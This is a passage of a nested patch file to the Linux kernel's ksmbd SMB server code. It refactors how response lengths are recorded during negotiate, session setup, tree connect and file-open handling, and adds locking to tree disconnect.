+-	pneg_ctxt->CompressionAlgorithmCount = cpu_to_le16(1);
+-	pneg_ctxt->Flags = cpu_to_le32(0);
+-	pneg_ctxt->CompressionAlgorithms[0] = comp_algo;
+-}
+-
+ static void build_sign_cap_ctxt(struct smb2_signing_capabilities *pneg_ctxt,
+ 				__le16 sign_algo)
+ {
+@@ -822,11 +831,10 @@ static void build_posix_ctxt(struct smb2_posix_neg_context *pneg_ctxt)
+ 	pneg_ctxt->Name[15] = 0x7C;
+ }
+ 
+-static void assemble_neg_contexts(struct ksmbd_conn *conn,
+-				  struct smb2_negotiate_rsp *rsp,
+-				  void *smb2_buf_len)
++static unsigned int assemble_neg_contexts(struct ksmbd_conn *conn,
++				  struct smb2_negotiate_rsp *rsp)
+ {
+-	char *pneg_ctxt = (char *)rsp +
++	char * const pneg_ctxt = (char *)rsp +
+ 			le32_to_cpu(rsp->NegotiateContextOffset);
+ 	int neg_ctxt_cnt = 1;
+ 	int ctxt_size;
+@@ -835,62 +843,46 @@ static void assemble_neg_contexts(struct ksmbd_conn *conn,
+ 		    "assemble SMB2_PREAUTH_INTEGRITY_CAPABILITIES context\n");
+ 	build_preauth_ctxt((struct smb2_preauth_neg_context *)pneg_ctxt,
+ 			   conn->preauth_info->Preauth_HashId);
+-	rsp->NegotiateContextCount = cpu_to_le16(neg_ctxt_cnt);
+-	inc_rfc1001_len(smb2_buf_len, AUTH_GSS_PADDING);
+ 	ctxt_size = sizeof(struct smb2_preauth_neg_context);
+-	/* Round to 8 byte boundary */
+-	pneg_ctxt += round_up(sizeof(struct smb2_preauth_neg_context), 8);
+ 
+ 	if (conn->cipher_type) {
++		/* Round to 8 byte boundary */
+ 		ctxt_size = round_up(ctxt_size, 8);
+ 		ksmbd_debug(SMB,
+ 			    "assemble SMB2_ENCRYPTION_CAPABILITIES context\n");
+-		build_encrypt_ctxt((struct smb2_encryption_neg_context *)pneg_ctxt,
++		build_encrypt_ctxt((struct smb2_encryption_neg_context *)
++				   (pneg_ctxt + ctxt_size),
+ 				   conn->cipher_type);
+-		rsp->NegotiateContextCount = cpu_to_le16(++neg_ctxt_cnt);
++		neg_ctxt_cnt++;
+ 		ctxt_size += sizeof(struct smb2_encryption_neg_context) + 2;
+-		/* Round to 8 byte boundary */
+-		pneg_ctxt +=
+-			round_up(sizeof(struct smb2_encryption_neg_context) + 2,
+-				 8);
+ 	}
+ 
+-	if (conn->compress_algorithm) {
+-		ctxt_size = round_up(ctxt_size, 8);
+-		ksmbd_debug(SMB,
+-			    "assemble SMB2_COMPRESSION_CAPABILITIES context\n");
+-		/* Temporarily set to SMB3_COMPRESS_NONE */
+-		build_compression_ctxt((struct smb2_compression_capabilities_context *)pneg_ctxt,
+-				       conn->compress_algorithm);
+-		rsp->NegotiateContextCount = cpu_to_le16(++neg_ctxt_cnt);
+-		ctxt_size += sizeof(struct smb2_compression_capabilities_context) + 2;
+-		/* Round to 8 byte boundary */
+-		pneg_ctxt += round_up(sizeof(struct smb2_compression_capabilities_context) + 2,
+-				      8);
+-	}
++	/* compression context not yet supported */
++	WARN_ON(conn->compress_algorithm != SMB3_COMPRESS_NONE);
+ 
+ 	if (conn->posix_ext_supported) {
+ 		ctxt_size = round_up(ctxt_size, 8);
+ 		ksmbd_debug(SMB,
+ 			    "assemble SMB2_POSIX_EXTENSIONS_AVAILABLE context\n");
+-		build_posix_ctxt((struct smb2_posix_neg_context *)pneg_ctxt);
+-		rsp->NegotiateContextCount = cpu_to_le16(++neg_ctxt_cnt);
++		build_posix_ctxt((struct smb2_posix_neg_context *)
++				 (pneg_ctxt + ctxt_size));
++		neg_ctxt_cnt++;
+ 		ctxt_size += sizeof(struct smb2_posix_neg_context);
+-		/* Round to 8 byte boundary */
+-		pneg_ctxt += round_up(sizeof(struct smb2_posix_neg_context), 8);
+ 	}
+ 
+ 	if (conn->signing_negotiated) {
+ 		ctxt_size = round_up(ctxt_size, 8);
+ 		ksmbd_debug(SMB,
+ 			    "assemble SMB2_SIGNING_CAPABILITIES context\n");
+-		build_sign_cap_ctxt((struct smb2_signing_capabilities *)pneg_ctxt,
++		build_sign_cap_ctxt((struct smb2_signing_capabilities *)
++				    (pneg_ctxt + ctxt_size),
+ 				    conn->signing_algorithm);
+-		rsp->NegotiateContextCount = cpu_to_le16(++neg_ctxt_cnt);
++		neg_ctxt_cnt++;
+ 		ctxt_size += sizeof(struct smb2_signing_capabilities) + 2;
+ 	}
+ 
+-	inc_rfc1001_len(smb2_buf_len, ctxt_size);
++	rsp->NegotiateContextCount = cpu_to_le16(neg_ctxt_cnt);
++	return ctxt_size + AUTH_GSS_PADDING;
+ }
+ 
+ static __le32 decode_preauth_ctxt(struct ksmbd_conn *conn,
+@@ -935,7 +927,7 @@ static void decode_encrypt_ctxt(struct ksmbd_conn *conn,
+ 		return;
+ 	}
+ 
+-	if (!(server_conf.flags & KSMBD_GLOBAL_FLAG_SMB2_ENCRYPTION))
++	if (server_conf.flags & KSMBD_GLOBAL_FLAG_SMB2_ENCRYPTION_OFF)
+ 		return;
+ 
+ 	for (i = 0; i < cph_cnt; i++) {
+@@ -1106,7 +1098,7 @@ int smb2_handle_negotiate(struct ksmbd_work *work)
+ 	struct smb2_negotiate_req *req = smb2_get_msg(work->request_buf);
+ 	struct smb2_negotiate_rsp *rsp = smb2_get_msg(work->response_buf);
+ 	int rc = 0;
+-	unsigned int smb2_buf_len, smb2_neg_size;
++	unsigned int smb2_buf_len, smb2_neg_size, neg_ctxt_len = 0;
+ 	__le32 status;
+ 
+ 	ksmbd_debug(SMB, "Received negotiate request\n");
+@@ -1199,7 +1191,7 @@ int smb2_handle_negotiate(struct ksmbd_work *work)
+ 						 conn->preauth_info->Preauth_HashValue);
+ 		rsp->NegotiateContextOffset =
+ 				cpu_to_le32(OFFSET_OF_NEG_CONTEXT);
+-		assemble_neg_contexts(conn, rsp, work->response_buf);
++		neg_ctxt_len = assemble_neg_contexts(conn, rsp);
+ 		break;
+ 	case SMB302_PROT_ID:
+ 		init_smb3_02_server(conn);
+@@ -1249,9 +1241,6 @@ int smb2_handle_negotiate(struct ksmbd_work *work)
+ 	rsp->SecurityBufferLength = cpu_to_le16(AUTH_GSS_LENGTH);
+ 	ksmbd_copy_gss_neg_header((char *)(&rsp->hdr) +
+ 				  le16_to_cpu(rsp->SecurityBufferOffset));
+-	inc_rfc1001_len(work->response_buf, sizeof(struct smb2_negotiate_rsp) -
+-			sizeof(struct smb2_hdr) - sizeof(rsp->Buffer) +
+-			 AUTH_GSS_LENGTH);
+ 	rsp->SecurityMode = SMB2_NEGOTIATE_SIGNING_ENABLED_LE;
+ 	conn->use_spnego = true;
+ 
+@@ -1269,9 +1258,16 @@ int smb2_handle_negotiate(struct ksmbd_work *work)
+ 	ksmbd_conn_set_need_negotiate(conn);
+ 
+ err_out:
++	if (rc)
++		rsp->hdr.Status = STATUS_INSUFFICIENT_RESOURCES;
++
++	if (!rc)
++		rc = ksmbd_iov_pin_rsp(work, rsp,
++				       sizeof(struct smb2_negotiate_rsp) -
++					sizeof(rsp->Buffer) +
++					AUTH_GSS_LENGTH + neg_ctxt_len);
+ 	if (rc < 0)
+ 		smb2_set_err_rsp(work);
+-
+ 	return rc;
+ }
+ 
+@@ -1471,7 +1467,6 @@ static int ntlm_authenticate(struct ksmbd_work *work,
+ 		memcpy((char *)&rsp->hdr.ProtocolId + sz, spnego_blob, spnego_blob_len);
+ 		rsp->SecurityBufferLength = cpu_to_le16(spnego_blob_len);
+ 		kfree(spnego_blob);
+-		inc_rfc1001_len(work->response_buf, spnego_blob_len - 1);
+ 	}
+ 
+ 	user = session_user(conn, req);
+@@ -1544,7 +1539,8 @@ static int ntlm_authenticate(struct ksmbd_work *work,
+ 			return -EINVAL;
+ 		}
+ 		sess->enc = true;
+-		rsp->SessionFlags = SMB2_SESSION_FLAG_ENCRYPT_DATA_LE;
++		if (server_conf.flags & KSMBD_GLOBAL_FLAG_SMB2_ENCRYPTION)
++			rsp->SessionFlags = SMB2_SESSION_FLAG_ENCRYPT_DATA_LE;
+ 		/*
+ 		 * signing is disable if encryption is enable
+ 		 * on this session
+@@ -1616,7 +1612,6 @@ static int krb5_authenticate(struct ksmbd_work *work,
+ 		return -EINVAL;
+ 	}
+ 	rsp->SecurityBufferLength = cpu_to_le16(out_len);
+-	inc_rfc1001_len(work->response_buf, out_len - 1);
+ 
+ 	if ((conn->sign || server_conf.enforced_signing) ||
+ 	    (req->SecurityMode & SMB2_NEGOTIATE_SIGNING_REQUIRED))
+@@ -1630,7 +1625,8 @@ static int krb5_authenticate(struct ksmbd_work *work,
+ 			return -EINVAL;
+ 		}
+ 		sess->enc = true;
+-		rsp->SessionFlags = SMB2_SESSION_FLAG_ENCRYPT_DATA_LE;
++		if (server_conf.flags & KSMBD_GLOBAL_FLAG_SMB2_ENCRYPTION)
++			rsp->SessionFlags = SMB2_SESSION_FLAG_ENCRYPT_DATA_LE;
+ 		sess->sign = false;
+ 	}
+ 
+@@ -1687,7 +1683,6 @@ int smb2_sess_setup(struct ksmbd_work *work)
+ 	rsp->SessionFlags = 0;
+ 	rsp->SecurityBufferOffset = cpu_to_le16(72);
+ 	rsp->SecurityBufferLength = 0;
+-	inc_rfc1001_len(work->response_buf, 9);
+ 
+ 	ksmbd_conn_lock(conn);
+ 	if (!req->hdr.SessionId) {
+@@ -1823,13 +1818,6 @@ int smb2_sess_setup(struct ksmbd_work *work)
+ 					goto out_err;
+ 				rsp->hdr.Status =
+ 					STATUS_MORE_PROCESSING_REQUIRED;
+-				/*
+-				 * Note: here total size -1 is done as an
+-				 * adjustment for 0 size blob
+-				 */
+-				inc_rfc1001_len(work->response_buf,
+-						le16_to_cpu(rsp->SecurityBufferLength) - 1);
+-
+ 			} else if (negblob->MessageType == NtLmAuthenticate) {
+ 				rc = ntlm_authenticate(work, req, rsp);
+ 				if (rc)
+@@ -1914,6 +1902,18 @@ out_err:
+ 				ksmbd_conn_set_need_negotiate(conn);
+ 			}
+ 		}
++		smb2_set_err_rsp(work);
++	} else {
++		unsigned int iov_len;
++
++		if (rsp->SecurityBufferLength)
++			iov_len = offsetof(struct smb2_sess_setup_rsp, Buffer) +
++				le16_to_cpu(rsp->SecurityBufferLength);
++		else
++			iov_len = sizeof(struct smb2_sess_setup_rsp);
++		rc = ksmbd_iov_pin_rsp(work, rsp, iov_len);
++		if (rc)
++			rsp->hdr.Status = STATUS_INSUFFICIENT_RESOURCES;
+ 	}
+ 
+ 	ksmbd_conn_unlock(conn);
+@@ -1991,14 +1991,20 @@ int smb2_tree_connect(struct ksmbd_work *work)
+ 	if (conn->posix_ext_supported)
+ 		status.tree_conn->posix_extensions = true;
+ 
++	write_lock(&sess->tree_conns_lock);
++	status.tree_conn->t_state = TREE_CONNECTED;
++	write_unlock(&sess->tree_conns_lock);
+ 	rsp->StructureSize = cpu_to_le16(16);
+-	inc_rfc1001_len(work->response_buf, 16);
+ out_err1:
+ 	rsp->Capabilities = 0;
+ 	rsp->Reserved = 0;
+ 	/* default manual caching */
+ 	rsp->ShareFlags = SMB2_SHAREFLAG_MANUAL_CACHING;
+ 
++	rc = ksmbd_iov_pin_rsp(work, rsp, sizeof(struct smb2_tree_connect_rsp));
++	if (rc)
++		status.ret = KSMBD_TREE_CONN_STATUS_NOMEM;
++
+ 	if (!IS_ERR(treename))
+ 		kfree(treename);
+ 	if (!IS_ERR(name))
+@@ -2111,26 +2117,56 @@ int smb2_tree_disconnect(struct ksmbd_work *work)
+ 	struct smb2_tree_disconnect_req *req;
+ 	struct ksmbd_session *sess = work->sess;
+ 	struct ksmbd_tree_connect *tcon = work->tcon;
++	int err;
+ 
+ 	WORK_BUFFERS(work, req, rsp);
+ 
+-	rsp->StructureSize = cpu_to_le16(4);
+-	inc_rfc1001_len(work->response_buf, 4);
+-
+ 	ksmbd_debug(SMB, "request\n");
+ 
+-	if (!tcon || test_and_set_bit(TREE_CONN_EXPIRE, &tcon->status)) {
++	if (!tcon) {
+ 		ksmbd_debug(SMB, "Invalid tid %d\n", req->hdr.Id.SyncId.TreeId);
+ 
+ 		rsp->hdr.Status = STATUS_NETWORK_NAME_DELETED;
+-		smb2_set_err_rsp(work);
+-		return 0;
++		err = -ENOENT;
++		goto err_out;
+ 	}
+ 
+ 	ksmbd_close_tree_conn_fds(work);
+-	ksmbd_tree_conn_disconnect(sess, tcon);
++
++	write_lock(&sess->tree_conns_lock);
++	if (tcon->t_state == TREE_DISCONNECTED) {
++		write_unlock(&sess->tree_conns_lock);
++		rsp->hdr.Status = STATUS_NETWORK_NAME_DELETED;
++		err = -ENOENT;
++		goto err_out;
++	}
++
++	WARN_ON_ONCE(atomic_dec_and_test(&tcon->refcount));
++	tcon->t_state = TREE_DISCONNECTED;
++	write_unlock(&sess->tree_conns_lock);
++
++	err = ksmbd_tree_conn_disconnect(sess, tcon);
++	if (err) {
++		rsp->hdr.Status = STATUS_NETWORK_NAME_DELETED;
++		goto err_out;
++	}
++
+ 	work->tcon = NULL;
++
++	rsp->StructureSize = cpu_to_le16(4);
++	err = ksmbd_iov_pin_rsp(work, rsp,
++				sizeof(struct smb2_tree_disconnect_rsp));
++	if (err) {
++		rsp->hdr.Status = STATUS_INSUFFICIENT_RESOURCES;
++		goto err_out;
++	}
++
+ 	return 0;
++
++err_out:
++	smb2_set_err_rsp(work);
++	return err;
++
+ }
+ 
+ /**
+@@ -2146,17 +2182,23 @@ int smb2_session_logoff(struct ksmbd_work *work)
+ 	struct smb2_logoff_rsp *rsp;
+ 	struct ksmbd_session *sess;
+ 	u64 sess_id;
++	int err;
+ 
+ 	WORK_BUFFERS(work, req, rsp);
+ 
+-	sess_id = le64_to_cpu(req->hdr.SessionId);
+-
+-	rsp->StructureSize = cpu_to_le16(4);
+-	inc_rfc1001_len(work->response_buf, 4);
+-
+ 	ksmbd_debug(SMB, "request\n");
+ 
++	ksmbd_conn_lock(conn);
++	if (!ksmbd_conn_good(conn)) {
++		ksmbd_conn_unlock(conn);
++		rsp->hdr.Status = STATUS_NETWORK_NAME_DELETED;
++		smb2_set_err_rsp(work);
++		return -ENOENT;
++	}
++	sess_id = le64_to_cpu(req->hdr.SessionId);
+ 	ksmbd_all_conn_set_status(sess_id, KSMBD_SESS_NEED_RECONNECT);
++	ksmbd_conn_unlock(conn);
++
+ 	ksmbd_close_session_fds(work);
+ 	ksmbd_conn_wait_idle(conn, sess_id);
+ 
+@@ -2169,7 +2211,7 @@ int smb2_session_logoff(struct ksmbd_work *work)
+ 		ksmbd_debug(SMB, "Invalid tid %d\n", req->hdr.Id.SyncId.TreeId);
+ 		rsp->hdr.Status = STATUS_NETWORK_NAME_DELETED;
+ 		smb2_set_err_rsp(work);
+-		return 0;
++		return -ENOENT;
+ 	}
+ 
+ 	ksmbd_destroy_file_table(&sess->file_table);
+@@ -2178,6 +2220,14 @@ int smb2_session_logoff(struct ksmbd_work *work)
+ 	ksmbd_free_user(sess->user);
+ 	sess->user = NULL;
+ 	ksmbd_all_conn_set_status(sess_id, KSMBD_SESS_NEED_NEGOTIATE);
++
++	rsp->StructureSize = cpu_to_le16(4);
++	err = ksmbd_iov_pin_rsp(work, rsp, sizeof(struct smb2_logoff_rsp));
++	if (err) {
++		rsp->hdr.Status = STATUS_INSUFFICIENT_RESOURCES;
++		smb2_set_err_rsp(work);
++		return err;
++	}
+ 	return 0;
+ }
+ 
+@@ -2230,7 +2280,10 @@ static noinline int create_smb2_pipe(struct ksmbd_work *work)
+ 	rsp->CreateContextsOffset = 0;
+ 	rsp->CreateContextsLength = 0;
+ 
+-	inc_rfc1001_len(work->response_buf, 88); /* StructureSize - 1*/
++	err = ksmbd_iov_pin_rsp(work, rsp, offsetof(struct smb2_create_rsp, Buffer));
++	if (err)
++		goto out;
++
+ 	kfree(name);
+ 	return 0;
+ 
+@@ -2309,7 +2362,7 @@ static int smb2_set_ea(struct smb2_ea_info *eabuf, unsigned int buf_len,
+ 			/* delete the EA only when it exits */
+ 			if (rc > 0) {
+ 				rc = ksmbd_vfs_remove_xattr(user_ns,
+-							    path->dentry,
++							    path,
+ 							    attr_name);
+ 
+ 				if (rc < 0) {
+@@ -2323,9 +2376,9 @@ static int smb2_set_ea(struct smb2_ea_info *eabuf, unsigned int buf_len,
+ 			/* if the EA doesn't exist, just do nothing. */
+ 			rc = 0;
+ 		} else {
+-			rc = ksmbd_vfs_setxattr(user_ns,
+-						path->dentry, attr_name, value,
+-						le16_to_cpu(eabuf->EaValueLength), 0);
++			rc = ksmbd_vfs_setxattr(user_ns, path, attr_name, value,
++						le16_to_cpu(eabuf->EaValueLength),
++						0, true);
+ 			if (rc < 0) {
+ 				ksmbd_debug(SMB,
+ 					    "ksmbd_vfs_setxattr is failed(%d)\n",
+@@ -2388,8 +2441,7 @@ static noinline int smb2_set_stream_name_xattr(const struct path *path,
+ 		return -EBADF;
+ 	}
+ 
+-	rc = ksmbd_vfs_setxattr(user_ns, path->dentry,
+-				xattr_stream_name, NULL, 0, 0);
++	rc = ksmbd_vfs_setxattr(user_ns, path, xattr_stream_name, NULL, 0, 0, false);
+ 	if (rc < 0)
+ 		pr_err("Failed to store XATTR stream name :%d\n", rc);
+ 	return 0;
+@@ -2417,7 +2469,7 @@ static int smb2_remove_smb_xattrs(const struct path *path)
+ 		if (!strncmp(name, XATTR_USER_PREFIX, XATTR_USER_PREFIX_LEN) &&
+ 		    !strncmp(&name[XATTR_USER_PREFIX_LEN], STREAM_PREFIX,
+ 			     STREAM_PREFIX_LEN)) {
+-			err = ksmbd_vfs_remove_xattr(user_ns, path->dentry,
++			err = ksmbd_vfs_remove_xattr(user_ns, path,
+ 						     name);
+ 			if (err)
+ 				ksmbd_debug(SMB, "remove xattr failed : %s\n",
+@@ -2464,8 +2516,7 @@ static void smb2_new_xattrs(struct ksmbd_tree_connect *tcon, const struct path *
+ 	da.flags = XATTR_DOSINFO_ATTRIB | XATTR_DOSINFO_CREATE_TIME |
+ 		XATTR_DOSINFO_ITIME;
+ 
+-	rc = ksmbd_vfs_set_dos_attrib_xattr(mnt_user_ns(path->mnt),
+-					    path->dentry, &da);
++	rc = ksmbd_vfs_set_dos_attrib_xattr(mnt_user_ns(path->mnt), path, &da, true);
+ 	if (rc)
+ 		ksmbd_debug(SMB, "failed to store file attribute into xattr\n");
+ }
+@@ -2492,8 +2543,9 @@ static void smb2_update_xattrs(struct ksmbd_tree_connect *tcon,
+ 	}
+ }
+ 
+-static int smb2_creat(struct ksmbd_work *work, struct path *path, char *name,
+-		      int open_flags, umode_t posix_mode, bool is_dir)
++static int smb2_creat(struct ksmbd_work *work, struct path *parent_path,
++		      struct path *path, char *name, int open_flags,
++		      umode_t posix_mode, bool is_dir)
+ {
+ 	struct ksmbd_tree_connect *tcon = work->tcon;
+ 	struct ksmbd_share_config *share = tcon->share_conf;
+@@ -2520,7 +2572,7 @@ static int smb2_creat(struct ksmbd_work *work, struct path *path, char *name,
+ 			return rc;
+ 	}
+ 
+-	rc = ksmbd_vfs_kern_path(work, name, 0, path, 0);
++	rc = ksmbd_vfs_kern_path_locked(work, name, 0, parent_path, path, 0);
+ 	if (rc) {
+ 		pr_err("cannot get linux path (%s), err = %d\n",
+ 		       name, rc);
+@@ -2554,7 +2606,7 @@ static int smb2_create_sd_buffer(struct ksmbd_work *work,
+ 	    sizeof(struct create_sd_buf_req))
+ 		return -EINVAL;
+ 	return set_info_sec(work->conn, work->tcon, path, &sd_buf->ntsd,
+-			    le32_to_cpu(sd_buf->ccontext.DataLength), true);
++			    le32_to_cpu(sd_buf->ccontext.DataLength), true, false);
+ }
+ 
+ static void ksmbd_acls_fattr(struct smb_fattr *fattr,
+@@ -2590,7 +2642,7 @@ int smb2_open(struct ksmbd_work *work)
+ 	struct ksmbd_tree_connect *tcon = work->tcon;
+ 	struct smb2_create_req *req;
+ 	struct smb2_create_rsp *rsp;
+-	struct path path;
++	struct path path, parent_path;
+ 	struct ksmbd_share_config *share = tcon->share_conf;
+ 	struct ksmbd_file *fp = NULL;
+ 	struct file *filp = NULL;
+@@ -2614,6 +2666,7 @@ int smb2_open(struct ksmbd_work *work)
+ 	u64 time;
+ 	umode_t posix_mode = 0;
+ 	__le32 daccess, maximal_access = 0;
++	int iov_len = 0;
+ 
+ 	WORK_BUFFERS(work, req, rsp);
+ 
+@@ -2635,7 +2688,7 @@ int smb2_open(struct ksmbd_work *work)
+ 		    *(char *)req->Buffer == '\\') {
+ 			pr_err("not allow directory name included leading slash\n");
+ 			rc = -EINVAL;
+-			goto err_out1;
++			goto err_out2;
+ 		}
+ 
+ 		name = smb2_get_name(req->Buffer,
+@@ -2646,7 +2699,7 @@ int smb2_open(struct ksmbd_work *work)
+ 			if (rc != -ENOMEM)
+ 				rc = -ENOENT;
+ 			name = NULL;
+-			goto err_out1;
++			goto err_out2;
+ 		}
+ 
+ 		ksmbd_debug(SMB, "converted name = %s\n", name);
+@@ -2654,48 +2707,44 @@ int smb2_open(struct ksmbd_work *work)
+ 			if (!test_share_config_flag(work->tcon->share_conf,
+ 						    KSMBD_SHARE_FLAG_STREAMS)) {
+ 				rc = -EBADF;
+-				goto err_out1;
++				goto err_out2;
+ 			}
+ 			rc = parse_stream_name(name, &stream_name, &s_type);
+ 			if (rc < 0)
+-				goto err_out1;
++				goto err_out2;
+ 		}
+ 
+ 		rc = ksmbd_validate_filename(name);
+ 		if (rc < 0)
+-			goto err_out1;
++			goto err_out2;
+ 
+ 		if (ksmbd_share_veto_filename(share, name)) {
+ 			rc = -ENOENT;
+ 			ksmbd_debug(SMB, "Reject open(), vetoed file: %s\n",
+ 				    name);
+-			goto err_out1;
++			goto err_out2;
+ 		}
+ 	} else {
+ 		name = kstrdup("", GFP_KERNEL);
+ 		if (!name) {
+ 			rc = -ENOMEM;
+-			goto err_out1;
++			goto err_out2;
+ 		}
+ 	}
+ 
+-	req_op_level = req->RequestedOplockLevel;
+-	if (req_op_level == SMB2_OPLOCK_LEVEL_LEASE)
+-		lc = parse_lease_state(req);
+-
+ 	if (le32_to_cpu(req->ImpersonationLevel) > le32_to_cpu(IL_DELEGATE)) {
+ 		pr_err("Invalid impersonationlevel : 0x%x\n",
+ 		       le32_to_cpu(req->ImpersonationLevel));
+ 		rc = -EIO;
+ 		rsp->hdr.Status = STATUS_BAD_IMPERSONATION_LEVEL;
+-		goto err_out1;
++		goto err_out2;
+ 	}
+ 
+ 	if (req->CreateOptions && !(req->CreateOptions & CREATE_OPTIONS_MASK_LE)) {
+ 		pr_err("Invalid create options : 0x%x\n",
+ 		       le32_to_cpu(req->CreateOptions));
+ 		rc = -EINVAL;
+-		goto err_out1;
++		goto err_out2;
+ 	} else {
+ 		if (req->CreateOptions & FILE_SEQUENTIAL_ONLY_LE &&
+ 		    req->CreateOptions & FILE_RANDOM_ACCESS_LE)
+@@ -2705,13 +2754,13 @@ int smb2_open(struct ksmbd_work *work)
+ 		    (FILE_OPEN_BY_FILE_ID_LE | CREATE_TREE_CONNECTION |
+ 		     FILE_RESERVE_OPFILTER_LE)) {
+ 			rc = -EOPNOTSUPP;
+-			goto err_out1;
++			goto err_out2;
+ 		}
+ 
+ 		if (req->CreateOptions & FILE_DIRECTORY_FILE_LE) {
+ 			if (req->CreateOptions & FILE_NON_DIRECTORY_FILE_LE) {
+ 				rc = -EINVAL;
+-				goto err_out1;
++				goto err_out2;
+ 			} else if (req->CreateOptions & FILE_NO_COMPRESSION_LE) {
+ 				req->CreateOptions = ~(FILE_NO_COMPRESSION_LE);
+ 			}
+@@ -2723,21 +2772,21 @@ int smb2_open(struct ksmbd_work *work)
+ 		pr_err("Invalid create disposition : 0x%x\n",
+ 		       le32_to_cpu(req->CreateDisposition));
+ 		rc = -EINVAL;
+-		goto err_out1;
++		goto err_out2;
+ 	}
+ 
+ 	if (!(req->DesiredAccess & DESIRED_ACCESS_MASK)) {
+ 		pr_err("Invalid desired access : 0x%x\n",
+ 		       le32_to_cpu(req->DesiredAccess));
+ 		rc = -EACCES;
+-		goto err_out1;
++		goto err_out2;
+ 	}
+ 
+ 	if (req->FileAttributes && !(req->FileAttributes & FILE_ATTRIBUTE_MASK_LE)) {
+ 		pr_err("Invalid file attribute : 0x%x\n",
+ 		       le32_to_cpu(req->FileAttributes));
+ 		rc = -EINVAL;
+-		goto err_out1;
++		goto err_out2;
+ 	}
+ 
+ 	if (req->CreateContextsOffset) {
+@@ -2745,19 +2794,19 @@ int smb2_open(struct ksmbd_work *work)
+ 		context = smb2_find_context_vals(req, SMB2_CREATE_EA_BUFFER, 4);
+ 		if (IS_ERR(context)) {
+ 			rc = PTR_ERR(context);
+-			goto err_out1;
++			goto err_out2;
+ 		} else if (context) {
+ 			ea_buf = (struct create_ea_buf_req *)context;
+ 			if (le16_to_cpu(context->DataOffset) +
+ 			    le32_to_cpu(context->DataLength) <
+ 			    sizeof(struct create_ea_buf_req)) {
+ 				rc = -EINVAL;
+-				goto err_out1;
++				goto err_out2;
+ 			}
+ 			if (req->CreateOptions & FILE_NO_EA_KNOWLEDGE_LE) {
+ 				rsp->hdr.Status = STATUS_ACCESS_DENIED;
+ 				rc = -EACCES;
+-				goto err_out1;
++				goto err_out2;
+ 			}
+ 		}
+ 
+@@ -2765,7 +2814,7 @@ int smb2_open(struct ksmbd_work *work)
+ 						 SMB2_CREATE_QUERY_MAXIMAL_ACCESS_REQUEST, 4);
+ 		if (IS_ERR(context)) {
+ 			rc = PTR_ERR(context);
+-			goto err_out1;
++			goto err_out2;
+ 		} else if (context) {
+ 			ksmbd_debug(SMB,
+ 				    "get query maximal access context\n");
+@@ -2776,11 +2825,11 @@ int smb2_open(struct ksmbd_work *work)
+ 						 SMB2_CREATE_TIMEWARP_REQUEST, 4);
+ 		if (IS_ERR(context)) {
+ 			rc = PTR_ERR(context);
+-			goto err_out1;
++			goto err_out2;
+ 		} else if (context) {
+ 			ksmbd_debug(SMB, "get timewarp context\n");
+ 			rc = -EBADF;
+-			goto err_out1;
++			goto err_out2;
+ 		}
+ 
+ 		if (tcon->posix_extensions) {
+@@ -2788,7 +2837,7 @@ int smb2_open(struct ksmbd_work *work)
+ 							 SMB2_CREATE_TAG_POSIX, 16);
+ 			if (IS_ERR(context)) {
+ 				rc = PTR_ERR(context);
+-				goto err_out1;
++				goto err_out2;
+ 			} else if (context) {
+ 				struct create_posix *posix =
+ 					(struct create_posix *)context;
+@@ -2796,7 +2845,7 @@ int smb2_open(struct ksmbd_work *work)
+ 				    le32_to_cpu(context->DataLength) <
+ 				    sizeof(struct create_posix) - 4) {
+ 					rc = -EINVAL;
+-					goto err_out1;
++					goto err_out2;
+ 				}
+ 				ksmbd_debug(SMB, "get posix context\n");
+ 
+@@ -2808,11 +2857,14 @@ int smb2_open(struct ksmbd_work *work)
+ 
+ 	if (ksmbd_override_fsids(work)) {
+ 		rc = -ENOMEM;
+-		goto err_out1;
++		goto err_out2;
+ 	}
+ 
+-	rc = ksmbd_vfs_kern_path(work, name, LOOKUP_NO_SYMLINKS, &path, 1);
++	rc = ksmbd_vfs_kern_path_locked(work, name, LOOKUP_NO_SYMLINKS,
++					&parent_path, &path, 1);
+ 	if (!rc) {
++		file_present = true;
++
+ 		if (req->CreateOptions & FILE_DELETE_ON_CLOSE_LE) {
+ 			/*
+ 			 * If file exists with under flags, return access
+@@ -2821,7 +2873,6 @@ int smb2_open(struct ksmbd_work *work)
+ 			if (req->CreateDisposition == FILE_OVERWRITE_IF_LE ||
+ 			    req->CreateDisposition == FILE_OPEN_IF_LE) {
+ 				rc = -EACCES;
+-				path_put(&path);
+ 				goto err_out;
+ 			}
+ 
+@@ -2829,26 +2880,23 @@ int smb2_open(struct ksmbd_work *work)
+ 				ksmbd_debug(SMB,
+ 					    "User does not have write permission\n");
+ 				rc = -EACCES;
+-				path_put(&path);
+ 				goto err_out;
+ 			}
+ 		} else if (d_is_symlink(path.dentry)) {
+ 			rc = -EACCES;
+-			path_put(&path);
+ 			goto err_out;
+ 		}
+-	}
+ 
+-	if (rc) {
++		file_present = true;
++		user_ns = mnt_user_ns(path.mnt);
++	} else {
+ 		if (rc != -ENOENT)
+ 			goto err_out;
+ 		ksmbd_debug(SMB, "can not get linux path for %s, rc = %d\n",
+ 			    name, rc);
+ 		rc = 0;
+-	} else {
+-		file_present = true;
+-		user_ns = mnt_user_ns(path.mnt);
+ 	}
++
+ 	if (stream_name) {
+ 		if (req->CreateOptions & FILE_DIRECTORY_FILE_LE) {
+ 			if (s_type == DATA_STREAM) {
+@@ -2910,11 +2958,9 @@ int smb2_open(struct ksmbd_work *work)
+ 		if (!file_present) {
+ 			daccess = cpu_to_le32(GENERIC_ALL_FLAGS);
+ 		} else {
+-			rc = ksmbd_vfs_query_maximal_access(user_ns,
++			ksmbd_vfs_query_maximal_access(user_ns,
+ 							    path.dentry,
+ 							    &daccess);
+-			if (rc)
+-				goto err_out;
+ 			already_permitted = true;
+ 		}
+ 		maximal_access = daccess;
+@@ -2935,7 +2981,8 @@ int smb2_open(struct ksmbd_work *work)
+ 
+ 	/*create file if not present */
+ 	if (!file_present) {
+-		rc = smb2_creat(work, &path, name, open_flags, posix_mode,
++		rc = smb2_creat(work, &parent_path, &path, name, open_flags,
++				posix_mode,
+ 				req->CreateOptions & FILE_DIRECTORY_FILE_LE);
+ 		if (rc) {
+ 			if (rc == -ENOENT) {
+@@ -2976,15 +3023,16 @@ int smb2_open(struct ksmbd_work *work)
+ 
+ 			if ((daccess & FILE_DELETE_LE) ||
+ 			    (req->CreateOptions & FILE_DELETE_ON_CLOSE_LE)) {
+-				rc = ksmbd_vfs_may_delete(user_ns,
+-							  path.dentry);
++				rc = inode_permission(user_ns,
++						      d_inode(path.dentry->d_parent),
++						      MAY_EXEC | MAY_WRITE);
